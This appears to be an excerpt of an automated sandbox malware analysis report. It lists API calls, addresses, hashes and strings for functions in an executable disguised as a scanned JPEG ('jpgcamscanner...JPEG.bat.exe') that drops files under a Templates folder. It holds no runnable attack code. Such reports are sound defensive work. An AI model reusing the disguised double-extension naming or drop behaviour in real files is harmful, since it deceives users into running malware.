Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
Instruction ID: b219db4bd4a8167c49179a39135beeb084f81f4a85e7e9c76e455f2dfd64676a
Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
Instruction Fuzzy Hash: C6C09B717443007BEA31CB609D49F0777586B90B00F5584357311F50D0C6B4E451D62D

Function 0040403E Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403E6E), ref: 0040404C

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19

Function 0040318E Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F2A,?), ref: 0040319C

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Function 0040402B Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403E07), ref: 00404035

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
Instruction ID: 627edf876ec6fe827e8ded8b6e0f84c3e1bff33d3b07c91bc4a796ca35ff40dd
Opcode Fuzzy Hash: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
Instruction Fuzzy Hash: CAA00176808101ABCB029B50FF09D9ABF62ABA5705B028435E65694174C7325865FF1A

Function 0040592D Relevance: 1.3, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,004032E3,"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe",00000020,"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe",00000000,?,00000006,00000008,0000000A), ref: 0040593A

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 34075671c2b15bfe90313587f721bfb83bbc5626d38128025375f4e5ae623440
Instruction ID: 257f9b2ec13a44fcc4a6720f2fb510ce371e6781c3dd22a2fabd0d4683e6d8f0
Opcode Fuzzy Hash: 34075671c2b15bfe90313587f721bfb83bbc5626d38128025375f4e5ae623440
Instruction Fuzzy Hash: 35C080B0C0C680D7C62147208024D677FE1AA52370F644456F0C467250C2346C00CF27

Non-executed Functions

Function 00404A0E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404A26
GetDlgItem.USER32(?,00000408), ref: 00404A31
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A7B
LoadBitmapA.USER32(0000006E), ref: 00404A8E
SetWindowLongA.USER32(?,000000FC,00405005), ref: 00404AA7
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404ABB
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404ACD
SendMessageA.USER32(?,00001109,00000002), ref: 00404AE3
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404AEF
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B01
DeleteObject.GDI32(00000000), ref: 00404B04
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B2F
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B3B
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BD0
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BFB
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C0F
GetWindowLongA.USER32(?,000000F0), ref: 00404C3E
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C4C
ShowWindow.USER32(?,00000005), ref: 00404C5D
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D5A
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DBF
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DD4
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DF8
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E18
ImageList_Destroy.COMCTL32(00000000), ref: 00404E2D
GlobalFree.KERNEL32(00000000), ref: 00404E3D
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EB6
SendMessageA.USER32(?,00001102,?,?), ref: 00404F5F
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F6E
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F8E
ShowWindow.USER32(?,00000000), ref: 00404FDC
GetDlgItem.USER32(?,000003FE), ref: 00404FE7
ShowWindow.USER32(00000000), ref: 00404FEE

Strings

M, xrefs: 00404BB7
N, xrefs: 00404C98
, xrefs: 00404FC6

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 3aa9200d0cef3cc9d1c9496a6dfc6ea5d4dcc70451646f22d4cf46085a2c9c50
Instruction ID: e53edbee2b152b0549b5e4175851bd50996010034005c2ce37e30fc0cedab0f1
Opcode Fuzzy Hash: 3aa9200d0cef3cc9d1c9496a6dfc6ea5d4dcc70451646f22d4cf46085a2c9c50
Instruction Fuzzy Hash: A50260B0900209AFEB20DF94DC85AAE7BB5FB84315F10817AF610B62E1D7799D42DF58

Function 0040449B Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004044EA
SetWindowTextA.USER32(00000000,?), ref: 00404514
SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 004045C5
CoTaskMemFree.OLE32(00000000), ref: 004045D0
lstrcmpiA.KERNEL32(Call,spidskaalshoved Setup: Installing), ref: 00404602
lstrcatA.KERNEL32(?,Call), ref: 0040460E
SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404620

Part of subcall function 0040566A: GetDlgItemTextA.USER32(?,?,00000400,00404657), ref: 0040567D

Part of subcall function 004061D4: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe",75953410,C:\Users\user\AppData\Local\Temp\,00000000,004031B1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 0040622C
Part of subcall function 004061D4: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406239
Part of subcall function 004061D4: CharNextA.USER32(?,"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe",75953410,C:\Users\user\AppData\Local\Temp\,00000000,004031B1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 0040623E
Part of subcall function 004061D4: CharPrevA.USER32(?,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000,004031B1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 0040624E

GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,00000001,0041ECD8,?,?,000003FB,?), ref: 004046DE
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046F9

Part of subcall function 00404852: lstrlenA.KERNEL32(spidskaalshoved Setup: Installing,spidskaalshoved Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040476D,000000DF,00000000,00000400,?), ref: 004048F0
Part of subcall function 00404852: wsprintfA.USER32 ref: 004048F8
Part of subcall function 00404852: SetDlgItemTextA.USER32(?,spidskaalshoved Setup: Installing), ref: 0040490B

Strings

spidskaalshoved Setup: Installing, xrefs: 00404598, 004045FB
A, xrefs: 004045BE
Call, xrefs: 004045FC, 00404601, 0040460C
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244, xrefs: 004045EB

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244$Call$spidskaalshoved Setup: Installing
API String ID: 2624150263-354981701
Opcode ID: 16d05e7d4c75bf53039b3acf3d6a97a1f6807c39b67a56bad8d9f5ed37ac15b8
Instruction ID: 64b5da15ede57aab044e7fe1d22d086372aa44ea1ea65b7a694081baf4ac5fa5
Opcode Fuzzy Hash: 16d05e7d4c75bf53039b3acf3d6a97a1f6807c39b67a56bad8d9f5ed37ac15b8
Instruction Fuzzy Hash: 09A1A0B1900209ABDB11AFA5CC41AEFB7B8EF85314F14843BF611B72D1D77C8A418B69

Function 6DDA1A9C Relevance: 20.1, APIs: 13, Instructions: 571stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6DDA1215: GlobalAlloc.KERNEL32(00000040,6DDA1233,?,6DDA12CF,-6DDA404B,6DDA11AB,-000000A0), ref: 6DDA121D

GlobalAlloc.KERNEL32(00000040,000014A4), ref: 6DDA1BA6
lstrcpyA.KERNEL32(00000008,?), ref: 6DDA1BEE
lstrcpyA.KERNEL32(00000408,?), ref: 6DDA1BF8
GlobalFree.KERNEL32(00000000), ref: 6DDA1C0B
GlobalFree.KERNEL32(?), ref: 6DDA1CEB
GlobalFree.KERNEL32(?), ref: 6DDA1CF0
GlobalFree.KERNEL32(?), ref: 6DDA1CF5
GlobalFree.KERNEL32(00000000), ref: 6DDA1EDC
lstrcpyA.KERNEL32(?,?), ref: 6DDA2065
GetModuleHandleA.KERNEL32(00000008), ref: 6DDA20D8
LoadLibraryA.KERNEL32(00000008), ref: 6DDA20E9
GetProcAddress.KERNEL32(?,?), ref: 6DDA2142
lstrlenA.KERNEL32(00000408), ref: 6DDA215C

Memory Dump Source

Source File: 00000002.00000002.19336656011.000000006DDA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6DDA0000, based on PE: true

Associated: 00000002.00000002.19336624915.000000006DDA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.19336698506.000000006DDA3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.19336738516.000000006DDA5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6dda0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 15d96613c26fbe1a165c03f0b3b0fa13241117f0ee9b9e800c4b34870ab857a3
Instruction ID: 1bf4f8fa55c083c7eb85916b9524e5e2bfaf1e1a5300e36f81c428f9eb8d4328
Opcode Fuzzy Hash: 15d96613c26fbe1a165c03f0b3b0fa13241117f0ee9b9e800c4b34870ab857a3
Instruction Fuzzy Hash: 4F22C271D5820ADEDB21EFA9C8807ADBBF5FB05308F19C52AE1A5E3281D7749A41CB50

Function 004020D1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402153
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402202

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers, xrefs: 00402193

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers
API String ID: 123533781-496868922
Opcode ID: 47fee0a4dda9e5008c658ff02c9ef0e3ca5edd1e3ae8c59bda27b78e07a80ba0
Instruction ID: ec73ff0caae0e60496460f1ec28f3c10d8f634d21a3ec75631efcf554c5f22e8
Opcode Fuzzy Hash: 47fee0a4dda9e5008c658ff02c9ef0e3ca5edd1e3ae8c59bda27b78e07a80ba0
Instruction Fuzzy Hash: CF5148B1E00208BFCB10DFE4C989A9D7BB5EF48318F2085AAF515EB2D1DA799941CF14

Function 004026FE Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040270D

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: db84967a17207f02c6d0b5dcd89b339aa32118489e577b3dc6649bab2232210f
Instruction ID: 595bc86bb0b87b603365eb58ea040ec14d9195657b0818bf84ef9d27f643e594
Opcode Fuzzy Hash: db84967a17207f02c6d0b5dcd89b339aa32118489e577b3dc6649bab2232210f
Instruction Fuzzy Hash: AAF0A772604151EAD700E7A499499EEB768CB15315F60457BE281F20C1C6B88A469B3E

Function 00404174 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041FF
GetDlgItem.USER32(00000000,000003E8), ref: 00404213
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404231
GetSysColor.USER32(?), ref: 00404242
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404251
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404260
lstrlenA.KERNEL32(?), ref: 00404263
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404272
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404287
GetDlgItem.USER32(?,0000040A), ref: 004042E9
SendMessageA.USER32(00000000), ref: 004042EC
GetDlgItem.USER32(?,000003E8), ref: 00404317
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404357
LoadCursorA.USER32(00000000,00007F02), ref: 00404366
SetCursor.USER32(00000000), ref: 0040436F
LoadCursorA.USER32(00000000,00007F00), ref: 00404385
SetCursor.USER32(00000000), ref: 00404388
SendMessageA.USER32(00000111,00000001,00000000), ref: 004043B4
SendMessageA.USER32(00000010,00000000,00000000), ref: 004043C8

Strings

Call, xrefs: 00404342
?A@, xrefs: 00404373
N, xrefs: 00404305

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
